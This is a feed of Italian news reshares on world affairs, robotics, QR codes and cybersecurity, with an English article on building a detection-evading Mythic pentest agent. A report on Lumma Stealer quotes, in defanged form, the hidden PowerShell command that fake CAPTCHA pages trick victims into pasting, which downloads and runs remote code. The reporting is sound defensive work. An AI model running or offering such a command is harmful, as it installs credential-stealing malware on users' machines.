Salta al contenuto principale



Missili da crociera lanciati da droni. Ecco il Banderol, la nuova arma di Mosca

@Notizie dall'Italia e dal mondo

Nel conflitto in Ucraina le forze armate russe hanno iniziato ad impiegare una nuova tipologia (e particolare) tipologia di missile da crociera. Il servizio d’Intelligence della Difesa ucraina (Gur) ha rivelato i dettagli del nuovo ordigno noto come S8000 “Banderol “(Бандероль, lemma russo traducibile come



Podcast Libia: Calma precaria dopo gli scontri di ieri. Ucciso un capo delle milizie


@Notizie dall'Italia e dal mondo
L’eliminazione di Abdulghani al Kikli, detto “Ghaniwa”, era pianificata da tempo. Questo il commento di molti a Tripoli dopo l’omicidio del comandante del Support Force Apparatus SSA, un delle milizie armate più potenti. Di ciò e degli scontri



Robot Umanoidi in Ogni Casa: Huawei e UBTech Lanciano la Nuova Rivoluzione


Huawei Technologies e UBTech Robotics hanno unito le forze per accelerare l’impiego di robot umanoidi nelle fabbriche e nelle case cinesi. I giganti della tecnologia hanno firmato l’accordo lunedì a Shenzhen, il polo dell’innovazione meridionale dove hanno sede entrambe le aziende.

I partner intendono trasformare gli sviluppi di laboratorio in un prodotto di massa che troverà applicazione sia nell’industria che nella vita di tutti i giorni. Nell’ambito della cooperazione, le aziende creeranno fabbriche “intelligenti” in cui lavoreranno robot umanoidi. Contemporaneamente, gli ingegneri lavoreranno alla progettazione robot di servizio per la casa, sia su due gambe che su una piattaforma con ruote.

Cosa si nasconde dietro il lato oscuro della tecnologia?

Con il supporto di Huawei, UBTech costruirà un centro di innovazione in cui si concentrerà sullo sviluppo dell'”intelligenza incarnata”. Questo speciale tipo di intelligenza artificiale consente di combinare le funzioni cognitive con il corpo fisico, consentendo ai robot di interagire in modo più efficace con il mondo che li circonda e di comprenderlo meglio.

Gli sviluppi di Huawei costituiranno la base tecnologica della partnership. L’azienda fornirà i processori Ascend e Kunpeng per i sistemi di intelligenza artificiale e utilizzerà anche le sue piattaforme cloud e i suoi modelli linguistici di grandi dimensioni. Tutte queste tecnologie contribuiranno a creare una nuova generazione di robot capaci di risolvere complessi problemi intellettuali.

Come sottolineato dai rappresentanti di entrambe le aziende, l’alleanza consentirà a Huawei di unire la propria esperienza nell’intelligenza artificiale e nel cloud computing con gli sviluppi specializzati di UBTech, leader riconosciuto nella creazione di robot di servizio “intelligenti“.

Il mercato ha reagito positivamente alla notizia della collaborazione: le azioni di UBTech sono aumentate di quasi il 10% il giorno dell’annuncio. Anche l’indice Hang Seng ha registrato la sua migliore performance dall’inizio di marzo, registrando un aumento del 3%. Gli analisti sostengono che questo ottimismo è dovuto in gran parte al miglioramento delle relazioni commerciali tra Stati Uniti e Cina.

La nuova partnership rafforzerà la posizione di Huawei nel mercato cinese della robotica in rapida crescita. La società di consulenza LeadeRobot prevede che il mercato nazionale dei robot potrebbe raddoppiare quest’anno, raggiungendo i 5,3 miliardi di yuan (732 milioni di dollari).

I robot umanoidi saranno uno dei principali motori di questa crescita. Secondo la società di ricerca TrendForce, sei su undici produttori cinesi di robot umanoidi prevedono di produrne più di mille unità ciascuno entro il 2025.

L'articolo Robot Umanoidi in Ogni Casa: Huawei e UBTech Lanciano la Nuova Rivoluzione proviene da il blog della sicurezza informatica.



Amministrative: chi sono gli 8 candidati sostenuti dalla campagna “Facciamo eleggere”


@Politica interna, europea e internazionale
Quest’anno sono otto i candidati e le candidate alle prossime elezioni amministrative sostenuti dalla campagna “Facciamo Eleggere”, promossa dal Forum Disuguaglianze e Diversità e dal comitato Ti Candido. A questi otto se ne aggiungono altri due, sostenuti




Oggi dalle 16.30, presso la Sala Polifunzionale di Palazzo Chigi si terrà la cerimonia di premiazione della prima edizione del concorso nazionale “No alla droga, no ad ogni forma di dipendenza” promosso dal #MIM, dal Dipartimento delle politiche cont…
#MIM




Studying QR Code Degradation


It’s fair to say that QR codes are a technology that has finally come of age. A decade or more ago they were a little over-hyped and sometimes used in inappropriate or pointless ways, but now they are an accepted and useful part of life.

They’re not without their faults though, one of which is that despite four increasingly redundant levels of error correction, there comes a point at which a degraded QR code can no longer be read. [HumanQR] is soliciting these broken QR codes for research purposes and inclusion in an eventual open-source database, and they’ll even have a shot at repairing your submissions for you.

It’s a problem inherent to all digital media, that once the limit of whatever error correction they contain has been reached, they arrive at a cliff-edge at which they go immediately from readability to non readability. The example given in the linked article is a locator tag on a stray cat, it had been rubbed away in part. Improving its contrast, sharply defining its edges, and improving the definition of its fiducials was able to revive it, we hope leading to the cat being returned home.

The idea is that by studying enough damaged codes it should be possible to identify the means by which they become degraded, and perhaps come up with a way to inform some repair software. Meanwhile if you are interested, you might want to learn more about how they work, the hard way.


hackaday.com/2025/05/13/studyi…



Sovranità digitale. Cos’è e quali sono le principali minacce al cyberspazio nazionale.


“In un cyberspazio globale e aperto, la piena sovranità digitale implica l’autorità complessiva di una nazione sui dati generati dai suoi cittadini, dall’amministrazione pubblica e dalle imprese. Ciò include la capacità di una nazione di impiegare tecnologie sicure per elaborare questi dati, supportate da una forza lavoro sufficiente, competente e fidata. Inoltre, comporta l’istituzione e il mantenimento di attivo di collaborazioni internazionali dinamiche e mirate, per affrontare proattivamente le minacce. Richiede infine, una società pienamente consapevole e educata sui rischi presenti nel cyberspazio”. In queste poche righe il professore Roberto Baldoni ha sintetizzato la sua idea di sovranità tecnologica raccontata nell’omonimo libro del Mulino (2025), Sovranità digitale. Cos’è e quali sono le principali minacce al cyberspazio nazionale.

Il saggio, riduzione aggiornata di un precedente testo in inglese dello stesso autore, Charting digital sovereignity. A survival playbook (Amazon, 2024), descrive in maniera sintetica i quattro ambiti che mettono a rischio la sovranità digitale intesa come autogoverno di dati, tecnologie, infrastrutture, persone, e cioè: a) gli attacchi informatici; b) le minacce alla supply chain delle forniture critiche; c) la diffusione delle tecnologie emergenti come Intelligenza artificiale e Quantum Computing; d) le minacce sociali, industriali, tecnologiche e ibride.

I quattro ambiti vengono analizzati da Baldoni facendo ricorso anche ad esempi di cronaca e sono ricchi di dettagli circa il modo di operare di threat insider, hacker e APT, illustrano gli attacchi DDoS e ransomware, e illustrano i rischi della supply chain con riferimento ai casi SolarWinds e Kaseya, all’emergenza dei chatbot e degli algoritmi predittivi, fino alla disinformazione costitutiva dei social network, citando i famosi casi della Brexit, del Pizzagate e del passaggio di mano di Twitter, oggi X.

Roberto Baldoni, veterano del settore, per venti anni docente di Sistemi distribuiti alla facoltà di Ingegneria della Sapienza Università di Roma, ideatore dell’Agenzia per la cybersicurezza nazionale e suo primo direttore dal 2021 al 2023, è tuttavia attento a chiarire che quello di sovranità digitale è un concetto mobile che gli stessi studiosi non hanno ancora definito in maniera univoca e che gli Stati nazione interpretano in maniera diversa. E tuttavia insiste su una definizione operativa, la capacità di una nazione di proteggere il proprio cyberspace come se proteggesse un territorio fisico, e il cui fallimento equivale a consegnare i suoi abitanti a un potere oscuro e incontrollabile, quello di un progresso dove attori malevoli sfruttano macchine che sopravanzano gli umani e aggirano tutti i contrappesi della democrazia.


dicorinto.it/articoli/recensio…



Pensavi di Essere al Sicuro? Il Vero Malware È Nella Tua Testa!


Nell’era dell’informazione, la cybersecurity si erge a baluardo contro minacce digitali in continua evoluzione. Tuttavia, le difese più sofisticate possono vacillare di fronte a un nemico invisibile e insidioso: i bias cognitivi che plasmano il nostro processo decisionale. Tra questi, il bias di ancoraggio emerge come un fattore critico, influenzando silenziosamente le valutazioni di rischio, le risposte agli incidenti e persino l’adozione di misure protettive. Comprendere la profonda connessione tra cybersecurity e questo meccanismo psicologico è fondamentale per rafforzare le nostre difese e navigare con maggiore consapevolezza il complesso panorama digitale.

Le manifestazioni del Bias di ancoraggio


Il bias di ancoraggio ci porta a fare eccessivo affidamento sulla prima informazione disponibile quando prendiamo decisioni in condizioni di incertezza. Questa “àncora” iniziale, anche se irrilevante o incompleta, influenza in modo sproporzionato i nostri giudizi successivi.

Nel contesto della cybersecurity, questo si traduce in una serie di vulnerabilità cognitive che i cybercriminali possono astutamente sfruttare:

  • Valutazione del Rischio: Un analista di sicurezza potrebbe ancorare la propria valutazione del rischio di un nuovo attacco a statistiche obsolete o a un incidente passato specifico, sottovalutando la potenziale portata o sofisticazione della minaccia attuale. L’àncora del “già visto” impedisce una valutazione fresca e completa.
  • Analisi delle Vulnerabilità: Un team di sicurezza potrebbe concentrarsi eccessivamente sulla prima vulnerabilità critica identificata da uno scanner automatico, ancorando a quel “punteggio alto” la propria priorità di intervento, trascurando vulnerabilità meno evidenti ma potenzialmente più sfruttabili in combinazione.
  • Risposta agli Incidenti: Durante un attacco, le prime informazioni frammentarie sulla sua origine o sul vettore iniziale potrebbero ancorare le indagini del team di risposta, portandoli a focalizzarsi su una pista errata e ritardando l’identificazione della vera causa e la mitigazione efficace.
  • Scelta di Soluzioni di Sicurezza: Il prezzo iniziale di una soluzione di sicurezza o la prima funzionalità accattivante presentata da un venditore possono agire come ancore potenti, influenzando la percezione del valore complessivo e oscurando la valutazione di alternative potenzialmente più adatte o di considerazioni a lungo termine.
  • Comportamento degli Utenti: Gli utenti finali possono ancorare la propria fiducia a elementi superficiali come un logo familiare in un’email di phishing o un tono rassicurante, ignorando segnali d’allarme più sottili e cadendo vittime di attacchi di social engineering.


Le Tattiche dei Cybercriminali


I cybercriminali, spesso senza una formale formazione in psicologia, dimostrano una sorprendente intuizione nel manipolare il bias di ancoraggio a proprio vantaggio. Le loro tattiche sono finemente calibrate per sfruttare la nostra tendenza ad affidarci alla prima informazione ricevuta. Un’email di phishing che imita alla perfezione la grafica e il tono della nostra banca crea un’ancora di familiarità e fiducia, rendendoci meno inclini a scrutinare attentamente il contenuto. Un messaggio allarmante che annuncia un’urgente violazione della sicurezza del nostro account innesca un’ancora emotiva di paura e ansia, spingendoci ad agire impulsivamente senza riflettere. Offerte online incredibilmente vantaggiose ancorano la nostra attenzione sul guadagno potenziale, distraendoci dai segnali d’allarme di una possibile truffa.

In sostanza, i criminali informatici gettano queste “ancore” psicologiche nel flusso delle nostre interazioni digitali, sapendo che la nostra mente, una volta agganciata, sarà più facilmente guidata verso azioni che compromettono la nostra sicurezza.

La Vera Vulnerabilità


In un’era in cui le minacce informatiche si evolvono con rapidità sorprendente, affidarsi unicamente a soluzioni tecnologiche per la difesa è come costruire una fortezza con fondamenta instabili. Il bias di ancoraggio ci svela una verità fondamentale: le vulnerabilità più pericolose non risiedono sempre nelle righe di codice, ma nelle scorciatoie mentali che adottiamo per navigare la complessità del mondo digitale.

Riconoscere il potere silenzioso di questa “prima impressione” – quel primo contatto visivo con un’email, quel titolo accattivante di un link, quell’allarme inaspettato sullo schermo – è un atto di consapevolezza cruciale, un invito a esercitare una vigilanza che trascende la mera tecnologia, abbracciando la profondità della psicologia umana.

Comprendere il bias di ancoraggio è come riconoscere la corrente insidiosa che ci spinge verso scogli digitali apparentemente sicuri; solo diventando marinai consapevoli delle sue forze invisibili potremo governare la nostra navigazione online con prudenza, evitando che la prima impressione diventi la nostra ultima, disastrosa, destinazione.

Ignorare la psicologia nella cybersecurity è come costruire un’imponente fortezza digitale dimenticando di presidiare le porte con sentinelle umane: per quanto solide siano le mura virtuali, una mente non consapevole dei bias resta una breccia aperta, un invito silenzioso per i predatori del cyberspazio.

L'articolo Pensavi di Essere al Sicuro? Il Vero Malware È Nella Tua Testa! proviene da il blog della sicurezza informatica.



Using a Mythic agent to optimize penetration testing



Introduction


The way threat actors use post-exploitation frameworks in their attacks is a topic we frequently discuss. It’s not just about analysis of artifacts for us, though. Our company’s deep expertise means we can study these tools to implement best practices in penetration testing. This helps organizations stay one step ahead.

Being experts in systems security assessment and information security in general, we understand that a proactive approach always works better than simply responding to incidents that have already occurred. And when we say “proactive”, we imply learning new technologies and techniques that threat actors may adopt next. That is why we follow the latest research, analyze new tools, and advance our pentesting expertise.

This report describes how our pentesters are using a Mythic framework agent. The text is written for educational purposes only and intended as an aid for security professionals who are conducting penetration testing with the system owner’s consent.

It’s worth noting that Kaspersky experts assign a high priority to the detection of the tools and techniques described in this article as well as many similar others employed by threat actors in real-world attacks.

These efforts to counter malicious actors use solutions like Kaspersky Endpoint Security that utilize the technologies listed below.

  • Behavioral analysis tracks processes running in the operating system, detects malicious activity, providing added security for critical OS components such as the Local Security Authority Subsystem Service process.
  • Exploit prevention stops threat actors from taking advantage of vulnerabilities in installed software and the OS itself.
  • Fileless threats protection detects and blocks threats that, instead of residing in the file system as traditional files, exist as scheduled tasks, WMI subscriptions, and so on.
  • There are many others too.

However, it’s worth noting that since our study discusses a sophisticated attack controlled directly by a malicious actor (or a pentester), more robust defense calls for a layered approach to security. This must incorporate security tools to help SOC experts quickly detect malicious activity and respond in real time.

These include Endpoint Detection and Response, Network Detection and Response and Extended Detection and Response solutions as well as Managed Detection and Response services. They provide continuous monitoring and response to potential incidents. Usage of threat intelligence to acquire up-to-date and relevant information about attacker tactics and techniques is another cornerstone of comprehensive defense against sophisticated threats and targeted attacks.

This study is the product of our exploration and analysis: how we as defenders can best prepare and what we should expect. What follows is part one of the report in which we compare pentesting tools and choose the option that suits the objectives of our study. Part two deals with how to communicate with the chosen framework and achieve our objectives.

Pentester tools: how to choose

An overview of ready-made solutions


Selecting pentesting tools can prove a challenging task. Few pentesters can avoid detection by EPP or EDR solutions. As soon as a pentesting tool gains popularity among attackers, defensive technologies begin detecting not only its behavior, but also its individual components. Besides, the ability to detect the tool becomes a key performance indicator for these technologies. As a result, pentesters have to spend more time preparing for a project.

At the same time, many existing solutions have flaws that impede pentesting. Ethical hackers, for example, frequently use Cobalt Strike. The Beacon agent uses a specific opcode sequence in platform version 4.9.1. To avoid detection by security solutions, opcodes must be changed, but that breaks the agent.

Immutable opcode sequence for Cobalt Strike agent
Immutable opcode sequence for Cobalt Strike agent

Another example is Metasploit’s Meterpreter payload, whose signatures appear in Microsoft’s antivirus database more than 230 times, making the tool significantly more difficult to use in projects.

The Sliver framework is an open-source project. It is in active development, and it can handle pentesting tasks. However, this project has a number of drawbacks, too.

  1. The size of a payload generated by the framework is 8–9 megabytes. This reduces flexibility because the ideal size of a pentesting agent that ensures versatility is about 100 KB.
  2. Stability issues. We’ve seen active sessions drop. The framework once lacked support for automatically using a proxy server from the Windows configuration, which also complicated its use. This has since been addressed.

The Havoc framework and its Demon payload are currently gaining popularity: both are evolving, and both support evasion techniques. However, the framework currently suffers from a lack of compliance with operational security (OPSEC) principles and stability issues. Additionally, payload customization in Havoc is limited by rigid parameters.

As you can see, we cannot fully rely on open-source projects for pentesting due to their significant shortcomings. On the other hand, creating tools from scratch would require extra resources, which is inefficient. So, it’s crucial to strike the right balance between building in-house solutions and leveraging open-source projects.

Payload structure


First, let’s define what kind of payload is required for pentesting. We had decided to split it into three modules: Stage 0, Stage 1 and Stage 2. The first module, Stage 0, creates and runs the payload. It must generate an artifact, such as a shellcode, a DLL or EXE file, or a VBA script, and provide maximum flexibility by offering customizable parameters for running the payload. This module also handles the circumvention of security measures and monitors the runtime environment.

The second module (Stage 1) must allow the operator to examine the host, perform initial reconnaissance, and then use that information to establish persistence via a payload maintaining covert communications. After successfully establishing persistence, this module must launch the third module (Stage 2) to perform further activities such as lateral movement, privilege escalation, data exfiltration, and credential harvesting.

Three payload modules
Three payload modules

The Stage 0 module has to be written from scratch, as available tools quickly get detected by security systems and become useless for penetration testing. To implement the Stage 1 module, we settled on a hybrid approach: partially modifying existing open-source projects while implementing some features in-house. For the third module (Stage 2), we also used open-source projects with minor modifications.

This article details the implementation of the second module (Stage 1) in detail.

Formulating requirements


In light of the objectives outlined above, we will formulate the requirements for the Stage 1 module.

  1. Dynamic functionality, or modularity, for increased resilience. In addition, dynamic configuration allows adding techniques via new modules without changing the functional core.
  2. Ensuring that the third payload module (Stage 2) runs.
  3. Minimal size (100–200 KB) and minimal traces left in the system.
  4. The module must comply with OPSEC principles and allow operations to run undetected by security controls. This means we must provide a mechanism for evading signature-based memory scanning.
  5. Employing non-standard (hidden) communication channels, outside of HTTP and TCP, to establish covert persistence and avoid network detection.


Choosing the best solution


While defining the requirements, we recognized the need for a modular design. To begin, we need to determine the best way to add new features while running the tasks. One widely used method for dynamically adding functionality is reflective DLL injection, introduced in 2008. This type of injection has both its upsides and downsides. The ReflectiveLoader function is fairly easy to detect, so we’d need a custom implementation for a dynamic configuration. This is an effective yet costly way of achieving modularity, so we decided to keep looking.

The PowerShell Empire framework, whose loader is based on reflective PowerShell execution, gained popularity in the mid-2010s. The introduction of strict monitoring and rigid policies surrounding PowerShell marked the end of its era, with .NET assemblies, executed reflectively using the Assembly.Load method, gaining popularity. Around this time, toolkits like SharpSploit and GhostPack emerged. Cobalt Strike’s execute-assembly feature, introduced in 2018, allowed for .NET assembly injection into a newly created process. Process creation followed by injection is a strong indicator of compromise and is subject to rigorous monitoring. Injecting code requires considerable planning and tailored resources, plus it’s easily detectable. It’s best used after you’ve already performed initial reconnaissance and established persistence.

The next stage of framework evolution is the execution of object files in memory. An object file (COFF, Common Object File Format) is a file that represents a compiled version of the source code. Object files are typically not full-fledged programs: they are needed to link and build a project. An object file includes several important elements ensuring that the executable code functions correctly.

  • Header contains information about the architecture, timestamp, number of sections and symbols, and other metadata.
  • Sections are blocks that may include assembly code, debugging information, linker directives, exception information, and static data.
  • Symbol table contains functions and variables, and information about their location in memory.

Using object files allows you to avoid loading a CLR environment into the process, such as when using a .NET assembly and the Assembly.Load method.

Moreover, COFF is executed in the current context, without the need to create a process and inject the code into it. The feature was introduced and popularized in 2020 by the developers of the Cobalt Strike framework. And in 2021, TrustedSec developed the open-source COFF Loader that serves the same purpose: the tool loads a COFF file from disk and runs it. This functionality perfectly aligns with our objectives because it enables us to perform the required actions: surveying, gaining persistence within the system and initiating the next module via an object file – if we incorporate network retrieval and in-memory execution of the file in the project. In addition, when using COFF Loader, the pentester can remain undetected in the system for a long time.

To interact with the agent in this study, we decided to use BOFs (Beacon Object Files) designed for Cobalt Strike Beacon. The internet offers a wide variety of open-source tools and functions created for BOFs. By using different BOFs as separate modules, we can easily add new techniques at any time without modifying the agent’s core.

Another key requirement for Stage 1 is a minimal payload size. Several approaches can achieve this: for instance, using C# can result in a Stage 1 size of around 20 KB. This is quite good, but the payload will then have a dependency on the .NET framework. If we use a native language like C, the unencrypted payload will be approximately 50 KB, which fits our needs.

Our payload requirements are supported by the Mythic framework. Its microservice architecture makes it easy to add arbitrary server-side functionality. For example, the module assembly process takes place inside a container and is fully defined by us. This allows us to replace specific strings with arbitrary values if detected. Furthermore, Mythic supports both standard communication protocols (HTTPS, TCP) and covert channels, such as encrypted communication over Slack or Telegram. Finally, the use of C ensures a small payload size. All of these factors make the Mythic framework and the agent interacting with it to execute BOFs an optimal choice for launching the second module.

Communication model


In the communication process between the agent and the framework, we need to focus on three elements: payload containers, C2 profile containers, and the translation container. Payload containers hold the agent’s source code and are responsible for building the payload. C2 profile containers are responsible for communicating with the agent. They must receive traffic from the agent and send it to Mythic for further processing. The translation container handles the encryption and decryption of network traffic. We’ll be using HTTP when interacting with Mythic, so the C2 profile will be a web server listening on ports 80 and 443.

Communication flow between the agent and the Mythic framework
Communication flow between the agent and the Mythic framework

Loading an object file


To load and execute an object file, the agent must read the .text section and replace all zeros with relative addresses of external functions and static data. This is known as symbol relocation, which addresses references within a particular section of the object file. Furthermore, the agent places these symbols in memory, for example, after the code section.

To find external functions, we’ll have to analyze the libraries specified in the linker directives of the object file. To do this, we used the functions LoadLibrary, GetModuleHandle and GetProcAddress.

The diagram below clarifies how an object file is loaded and memory is allocated for its components.

Object file representation on disk (left) and in memory (right)
Object file representation on disk (left) and in memory (right)

The downsides of the solution


The method described above has a number of shortcomings. Because object file execution is blocking, multiple tasks cannot run simultaneously. For long-term tasks, other methods such as process injection are necessary; however, this is not a critical flaw for the second module, as it is not intended for long-running tasks.

Several other shortcomings are difficult to mitigate. For example, since the object file is executed in the current thread, a critical error will terminate the process. Furthermore, during the execution of the object file in memory, the VirtualAlloc function is used for section mapping and relocation. A call to this WinAPI might alert the security system.

Implementing additional functionality during development and compilation can help complicate analysis and detection for more efficient pentesting and a longer agent life cycle.

Conclusion


Mythic’s features make it a convenient pentesting tool that covers the bulk of pentesting objectives. To utilize this framework efficiently, we created an agent that extends ready-made solutions with our own code. This configuration gave us suitable flexibility and enhanced protection against detection, which is most of what a pentester asks of a working tool.


securelist.com/agent-for-mythi…



Siae, ecco come l’Antitrust ha piegato Meta sulle canzoni

L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
Per l’Antitrust la chiusura del procedimento segna un punto di equilibrio tra le esigenze del mercato e la tutela della concorrenza. Meta si è impegnata a negoziare in buona fede e in tempi certi, Siae vedrà includere

reshared this



GAZA. Il giornalista Hassan Aslih ucciso da un drone mentre era in ospedale


@Notizie dall'Italia e dal mondo
Il reporter era in cura per una ferita riportata durante un precedente attacco. La sua uccisione porta a 215 il numero degli operatori dell'informazione uccisi a Gaza dal 7 ottobre 2023
L'articolo GAZA. Il giornalista Hassan Aslih ucciso da un drone mentre



Simulating High-Side Bootstrap Circuits With LTSpice


LTSpice is a tool that every electronics nerd should have at least a basic knowledge of. Those of us who work professionally in the analog and power worlds rely heavily on the validity of our simulations. It’s one of the basic skills taught at college, and essential to truly understand how a circuit behaves. [Mano] has quite a collection of videos about the tool, and here is a great video explanation of how a bootstrap circuit works, enabling a high-side driver to work in the context of driving a simple buck converter. However, before understanding what a bootstrap is, we need to talk a little theory.

Bootstrap circuits are very common when NMOS (or NPN) devices are used on the high side of a switching circuit, such as a half-bridge (and by extension, a full bridge) used to drive a motor or pump current into a power supply.
A simple half-bridge driving illustrates the high-side NMOS driving problem.
From a simplistic viewpoint, due to the apparent symmetry, you’d want to have an NMOS device at the bottom and expect a PMOS device to be at the top. However, PMOS and PNP devices are weaker, rarer and more expensive than NMOS, which is all down to the device physics; simply put, the hole mobility in silicon and most other semiconductors is much lower than the electron mobility, which results in much less current. Hence, NMOS and NPN are predominant in power circuits.

As some will be aware, to drive a high-side switching transistor, such as an NPN bipolar or an NMOS device, the source end will not be at ground, but will be tied to the switching node, which for a power supply is the output voltage. You need a way to drive the gate voltage in excess of the source or emitter end by at least the threshold voltage. This is necessary to get the device to fully turn on, to give the lowest resistance, and to cause the least power dissipation. But how do you get from the logic-level PWM control waveform to what the gate needs to switch correctly?

The answer is to use a so-called bootstrap capacitor. The idea is simple enough: during one half of the driving waveform, the capacitor is charged to some fixed voltage with respect to ground, since one end of the capacitor will be grounded periodically. On the other half cycle, the previously grounded end, jumps up to the output voltage (the source end of the high side transistor) which boosts the other side of the capacitor in excess of the source (because it got charged already) providing a temporary high-voltage floating supply than can be used to drive the high-side gate, and reliably switch on the transistor. [Mano] explains it much better in a practical scenario in the video below, but now you get the why and how of the technique.

We see videos about LTSpice quite a bit, like this excellent YouTube resource by [FesZ] for starters.

youtube.com/embed/Bh9ZN6GY3qI?…


hackaday.com/2025/05/13/simula…



Sorj Chalandon – Il mio traditore
freezonemagazine.com/articoli/…
La prima volta che ho visto il mio traditore mi ha insegnato a pisciare. È stato a Belfast, al Thomas Ashe, un locale riservato agli ex prigionieri repubblicani. Ero vicino alla porta, accanto al gran camino, seduto a un tavolo sommerso di bicchieri vuoti e cadaveri di bottiglie. Era il posto preferito da Jim e […]
L'articolo Sorj Chalandon – Il mio traditore proviene da FREE ZONE


Il vantaggio competitivo del fornitore conforme: come la NIS 2 premia chi investe in sicurezza


@Informatica (Italy e non Italy 😁)
In un contesto in cui la sicurezza della catena di approvvigionamento è ormai parte integrante della compliance normativa, il fornitore non è più un attore passivo. Ecco come può trasformare gli obblighi in un vantaggio



Le solite sciocchezze #novax, che continuano a girare dopo anni e anni...


...per fortuna Bufale le smentisce, anche se in un mondo normale basterebbe il buon senso.


I vaccini anti Covid NON sono “vaccini”? butac.it/i-vaccini-anti-covid-…



Attacchi informatici in Italia: parte l’OAD 2025, l’indagine più attesa sulla sicurezza digitale


L’OAD (Osservatorio Attacchi Digitali in Italia) è l’unica indagine in Italia che raccoglie dati sugli attacchi digitali intenzionali ai sistemi informativi e sulle relative misure di sicurezza, attraverso un questionario anonimo compilabile online. L’obiettivo è fornire un quadro aggiornato e realistico della situazione della sicurezza digitale nel Paese, utile sia per le aziende che per le pubbliche amministrazioni.

Struttura dell’indagine


Il Questionario si articola in due principali parti: quella sugli attacchi subiti e rilevati nel 2024, con approfondimenti “verticali” sugli attacchi ai siti e agli ambienti web del Sistema Informativo (SI) dell’azienda/ente rispondente, sulle applicazioni/servizi basati su Intelligenza Artificiale e sugli ambienti OT, Operational Technology eventualmente utilizzati dall’Azienda/Ente rispondente; e quella sulle misure di sicurezza digitali in uso, sia tecniche che organizzative.

Questa seconda parte è opzionale ma si suggerisce di compilarla per poter avere alla fine della compilazione una macro valutazione del livello di sicurezza digitale del SI oggetto delle risposte e, nel rispondere, farsi un quadro ed una veloce verifica delle principali misure di sicurezza tecniche ed organizzative che dovrebbero/potrebbero essere implementate in ogni moderno e sicuro SI.

Al termine della compilazione, i partecipanti ricevono una valutazione qualitativa del livello di sicurezza digitale del proprio sistema informativo.

Edizione 2025


L’edizione 2025 dell’OAD è attualmente in corso, rappresentando il 18° anno consecutivo di questa iniziativa. Il questionario è disponibile online e può essere compilato da responsabili IT, CISO, CIO e altri professionisti della sicurezza informatica. I risultati dell’indagine saranno presentati in un evento previsto per l’estate 2025.

Dove trovare i rapporti


I rapporti annuali dell’OAD, contenenti analisi dettagliate e dati statistici sugli attacchi digitali in Italia, sono disponibili gratuitamente sul sito ufficiale dell’iniziativa: www.oadweb.it. Questi documenti rappresentano una risorsa preziosa per comprendere l’evoluzione delle minacce informatiche nel contesto italiano.

Compila il rapporto relativo al 2025 : oadweb.it/LS2025/limesurvey/in…

L'articolo Attacchi informatici in Italia: parte l’OAD 2025, l’indagine più attesa sulla sicurezza digitale proviene da il blog della sicurezza informatica.

Gazzetta del Cadavere reshared this.



Lumma Stealer è tornato! Il malware che ruba tutto si evolve e diventa invisibile


Lumma Stealer è un noto malware specializzato nel furto di informazioni, attivo sin dalla metà del 2022. Negli ultimi mesi ha mostrato un’evoluzione significativa nelle sue modalità operative, adottando nuove tattiche, tecniche e procedure. Questa minaccia è sempre più presente nei report relativi agli incidenti di sicurezza informatica: solo nell’ultimo anno, sono state registrate migliaia di compromissioni attribuite al malware.

Si ritiene che abbia origini nell’ambiente cybercriminale russo e venga attualmente distribuito come Malware-as-a-Service (MaaS). I suoi creatori offrono aggiornamenti frequenti e assistenza agli utenti tramite canali Telegram e una documentazione ospitata su Gitbook. L’obiettivo principale di Lumma Stealer è l’esfiltrazione di dati sensibili, come credenziali di accesso, token di sessione, wallet di criptovalute e informazioni personali raccolte dai dispositivi infetti.

Ciò che rende Lumma particolarmente pericoloso sono le sue sofisticate tecniche di distribuzione, che di recente si sono espanse fino a includere l’ingegneria sociale attraverso false domande CAPTCHA e ingannevoli richieste di download. Questi metodi sfruttano la fiducia degli utenti nei processi di verifica di sicurezza più noti , inducendo le vittime a eseguire comandi dannosi sui propri sistemi.

I ricercatori di Sophos hanno identificato diverse campagne Lumma Stealer durante l’autunno e l’inverno 2024-25, documentando come le tattiche del malware si sono evolute per eludere il rilevamento. “Le variazioni che abbiamo riscontrato nel comportamento di Lumma Stealer sono significative per i difensori”, ha osservato il team Sophos Managed Detection and Response nel suo report, sottolineando che queste tecniche di distribuzione potrebbero essere facilmente adattate ad altri malware oltre a Lumma Stealer.

Un’innovazione particolarmente preoccupante riguarda l’abuso di Windows PowerShell attraverso pagine di verifica CAPTCHA ingannevoli.
Una casella di verifica dall’aspetto familiare (Fonte Sophos)
In questa catena di attacchi, alle vittime che visitano siti dannosi viene presentata una richiesta di verifica standard “Non sono un robot”, creando un falso senso di sicurezza e legittimità. Dopo aver cliccato sulla casella di verifica, gli utenti vengono reindirizzati a una seconda pagina che chiede loro di caricare il comando “Esegui” di Windows, quindi premere Ctrl+V seguito da Invio.
La successiva richiesta di “controllo di sicurezza” è un po’ insolita, ma abbastanza semplice per gli utenti incauti (Fonte Sophos)
Questa azione apparentemente innocua in realtà incolla ed esegue un comando PowerShell nascosto che opera in una finestra nascosta:

C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -
command $uR= hxxps[://]fixedzip[.]oss-ap-southeast5[.]aliyuncs[.]com/n
ew-artist[.]txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t
=$reS.Content; iex $t

L’esecuzione di questo comando avvia un sofisticato processo di attacco multifase. Lo script recupera componenti malware aggiuntivi dai server di comando e controllo, scaricando, estraendo ed eseguendo il payload principale di Lumma Stealer. Una volta attivo, questo malware accede sistematicamente ai dati del browser, come evidenziato nella Figura 6, dove Autolt3.exe accede ai dati di accesso e ai cookie di Chrome.
Flusso di attacco con abuso CAPTCHA (Fonte Sophos)
Ciò che rende questo vettore di attacco particolarmente efficace è l’impiego della crittografia AES per nascondere i payload successivi. Il malware impiega sofisticate tecniche di offuscamento, tra cui l’impiego di vettori di inizializzazione e complesse routine di decrittazione, per eludere le tradizionali misure di sicurezza. Questa combinazione di ingegneria sociale e metodi tecnici avanzati rappresenta un’evoluzione significativa nelle capacità di Lumma Stealer.

Gli esperti di sicurezza raccomandano di implementare soluzioni di protezione degli endpoint robuste con funzionalità di analisi comportamentale, poiché il solo rilevamento basato sulle firme si rivela inadeguato contro queste minacce in continua evoluzione.

L'articolo Lumma Stealer è tornato! Il malware che ruba tutto si evolve e diventa invisibile proviene da il blog della sicurezza informatica.



Operazione El Rais. Traffico di migranti gestito da egiziani smantellato dalla nostra Polizia di Stato in un contesto di cooperazione nell'ambito di una Operational Task Force di Europol


